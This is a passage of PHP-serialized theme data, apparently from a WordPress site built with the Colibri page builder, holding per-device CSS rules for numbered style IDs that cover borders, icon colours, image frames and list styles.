none;\n  border-right-width: 1px;\n  border-right-color: rgb(125, 79, 79);\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(125, 79, 79);\n  border-bottom-style: none;\n  border-left-width: 1px;\n  border-left-color: rgb(125, 79, 79);\n  border-left-style: none;\n}\n#colibri .style-749-icon:hover {\n  fill: #303e7a;\n  background-color: rgba(45, 45, 134, 0);\n  background-image: none;\n}\n#colibri .style-749 {\n  text-align: center;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:750;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-750 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:751;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-751 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:752;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-752-image {\n  opacity: 1;\n}\n#colibri .style-752-caption {\n  margin-top: 10px;\n}\n#colibri .style-752-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:753;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-753 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:754;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-754 ul {\n  list-style-type: disc;\n}\n#colibri .style-754 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:755;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-755-image {\n  opacity: 1;\n}\n#colibri .style-755-caption {\n  margin-top: 10px;\n}\n#colibri .style-755-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:756;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-756 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:757;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-757 ul {\n  list-style-type: disc;\n}\n#colibri .style-757 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:759;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-759-icon {\n  fill: #9ec9e2;\n  width: 20px ;\n  height: 20px;\n  border-top-width: 1px;\n  border-top-color: rgb(125, 79, 79);\n  border-top-style: none;\n  border-right-width: 1px;\n  border-right-color: rgb(125, 79, 79);\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(125, 79, 79);\n  border-bottom-style: none;\n  border-left-width: 1px;\n  border-left-color: rgb(125, 79, 79);\n  border-left-style: none;\n}\n#colibri .style-759-icon:hover {\n  fill: #303e7a;\n  background-color: rgba(45, 45, 134, 0);\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:761;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-761-icon {\n  fill: #9ec9e2;\n  width: 20px ;\n  height: 20px;\n  border-top-width: 1px;\n  border-top-color: rgb(125, 79, 79);\n  border-top-style: none;\n  border-right-width: 1px;\n  border-right-color: rgb(125, 79, 79);\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(125, 79, 79);\n  border-bottom-style: none;\n  border-left-width: 1px;\n  border-left-color: rgb(125, 79, 79);\n  border-left-style: none;\n}\n#colibri .style-761-icon:hover {\n  fill: #303e7a;\n  background-color: rgba(45, 45, 134, 0);\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:765;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-765 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:766;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-766 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:767;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-767-image {\n  opacity: 1;\n}\n#colibri .style-767-caption {\n  margin-top: 10px;\n}\n#colibri .style-767-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:768;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-768 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:770;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-770-icon {\n  fill: #9ec9e2;\n  width: 20px ;\n  height: 20px;\n  border-top-width: 1px;\n  border-top-color: rgb(125, 79, 79);\n  border-top-style: none;\n  border-right-width: 1px;\n  border-right-color: rgb(125, 79, 79);\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(125, 79, 79);\n  border-bottom-style: none;\n  border-left-width: 1px;\n  border-left-color: rgb(125, 79, 79);\n  border-left-style: none;\n}\n#colibri .style-770-icon:hover {\n  fill: #303e7a;\n  background-color: rgba(45, 45, 134, 0);\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:771;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-771 ul {\n  list-style-type: disc;\n}\n#colibri .style-771 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:772;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-772 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:773;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-773 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:774;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-774 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:775;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-775 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:776;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-776-image {\n  opacity: 1;\n}\n#colibri .style-776-caption {\n  margin-top: 10px;\n}\n#colibri .style-776-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:777;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-777 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:778;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-778 ul {\n  list-style-type: disc;\n}\n#colibri .style-778 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:780;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-780-icon {\n  fill: #9ec9e2;\n  width: 20px ;\n  height: 20px;\n  border-top-width: 1px;\n  border-top-color: rgb(125, 79, 79);\n  border-top-style: none;\n  border-right-width: 1px;\n  border-right-color: rgb(125, 79, 79);\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(125, 79, 79);\n  border-bottom-style: none;\n  border-left-width: 1px;\n  border-left-color: rgb(125, 79, 79);\n  border-left-style: none;\n}\n#colibri .style-780-icon:hover {\n  fill: #303e7a;\n  background-color: rgba(45, 45, 134, 0);\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:781;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-781-image {\n  opacity: 1;\n}\n#colibri .style-781-caption {\n  margin-top: 10px;\n}\n#colibri .style-781-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:782;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-782 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:783;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-783 ul {\n  list-style-type: disc;\n}\n#colibri .style-783 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:785;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-785-icon {\n  fill: #9ec9e2;\n  width: 20px ;\n  height: 20px;\n  border-top-width: 1px;\n  border-top-color: rgb(125, 79, 79);\n  border-top-style: none;\n  border-right-width: 1px;\n  border-right-color: rgb(125, 79, 79);\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(125, 79, 79);\n  border-bottom-style: none;\n  border-left-width: 1px;\n  border-left-color: rgb(125, 79, 79);\n  border-left-style: none;\n}\n#colibri .style-785-icon:hover {\n  fill: #303e7a;\n  background-color: rgba(45, 45, 134, 0);\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:786;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-786-image {\n  opacity: 1;\n}\n#colibri .style-786-caption {\n  margin-top: 10px;\n}\n#colibri .style-786-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:787;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-787 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:788;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-788 ul {\n  list-style-type: disc;\n}\n#colibri .style-788 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:791;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-791-image {\n  opacity: 1;\n}\n#colibri .style-791-caption {\n  margin-top: 10px;\n}\n#colibri .style-791-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:792;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-792 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:793;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-793 ul {\n  list-style-type: disc;\n}\n#colibri .style-793 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:795;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-795-icon {\n  fill: #9ec9e2;\n  width: 20px ;\n  height: 20px;\n  border-top-width: 1px;\n  border-top-color: rgb(125, 79, 79);\n  border-top-style: none;\n  border-right-width: 1px;\n  border-right-color: rgb(125, 79, 79);\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(125, 79, 79);\n  border-bottom-style: none;\n  border-left-width: 1px;\n  border-left-color: rgb(125, 79, 79);\n  border-left-style: none;\n}\n#colibri .style-795-icon:hover {\n  fill: #303e7a;\n  background-color: rgba(45, 45, 134, 0);\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:796;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-796 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:797;a:3:{s:7:\"desktop\";s:469:\"#colibri .style-797 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:798;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-798-image {\n  opacity: 1;\n}\n#colibri .style-798-caption {\n  margin-top: 10px;\n}\n#colibri .style-798-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:799;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-799 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:800;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-800 ul {\n  list-style-type: disc;\n}\n#colibri .style-800 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:802;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-802-icon {\n  fill: #9ec9e2;\n  width: 20px ;\n  height: 20px;\n  border-top-width: 1px;\n  border-top-color: rgb(125, 79, 79);\n  border-top-style: none;\n  border-right-width: 1px;\n  border-right-color: rgb(125, 79, 79);\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(125, 79, 79);\n  border-bottom-style: none;\n  border-left-width: 1px;\n  border-left-color: rgb(125, 79, 79);\n  border-left-style: none;\n}\n#colibri .style-802-icon:hover {\n  fill: #303e7a;\n  background-color: rgba(45, 45, 134, 0);\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:803;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-803-image {\n  opacity: 1;\n}\n#colibri .style-803-caption {\n  margin-top: 10px;\n}\n#colibri .style-803-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:804;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-804 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:805;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-805 ul {\n  list-style-type: disc;\n}\n#colibri .style-805 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:807;a:3:{s:7:\"desktop\";s:572:\"#colibri .style-807-icon {\n  fill: #9ec9e2;\n  width: 20px ;\n  height: 20px;\n  border-top-width: 1px;\n  border-top-color: rgb(125, 79, 79);\n  border-top-style: none;\n  border-right-width: 1px;\n  border-right-color: rgb(125, 79, 79);\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(125, 79, 79);\n  border-bottom-style: none;\n  border-left-width: 1px;\n  border-left-color: rgb(125, 79, 79);\n  border-left-style: none;\n}\n#colibri .style-807-icon:hover {\n  fill: #303e7a;\n  background-color: rgba(45, 45, 134, 0);\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:808;a:3:{s:7:\"desktop\";s:650:\".style-808 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 0px;\n}\n#colibri .style-808 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  box-shadow: 0px 1px 3px 1px rgba(0, 0, 0, 0.1) ;\n  background-color: #f6f8fa;\n  background-image: none;\n  border-top-width: 1px;\n  border-top-color: rgb(224, 225, 225);\n  border-top-style: solid;\n  border-right-width: 1px;\n  border-right-color: rgb(224, 225, 225);\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: rgb(224, 225, 225);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-color: rgb(224, 225, 225);\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:828;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-828 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:829;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:830;a:3:{s:7:\"desktop\";s:159:\".style-830 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-830 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:831;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-831-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-831-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-831-caption {\n  margin-top: 10px;\n}\n#colibri .style-831-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:832;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-832 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:833;a:3:{s:7:\"desktop\";s:201:\"#colibri .style-833 {\n  font-style: italic;\n}\n#colibri .style-833 p {\n  font-style: italic;\n}\n#colibri .style-833 ul {\n  list-style-type: disc;\n}\n#colibri .style-833 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:835;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-835 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-835 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-835 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-835 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:842;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:843;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-843 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:844;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-844 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:846;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-846 {\n  height: auto;\n  min-height: unset;\n  background-color: #F5FAFD;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:847;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:848;a:3:{s:7:\"desktop\";s:159:\".style-848 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-848 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:849;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-849-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  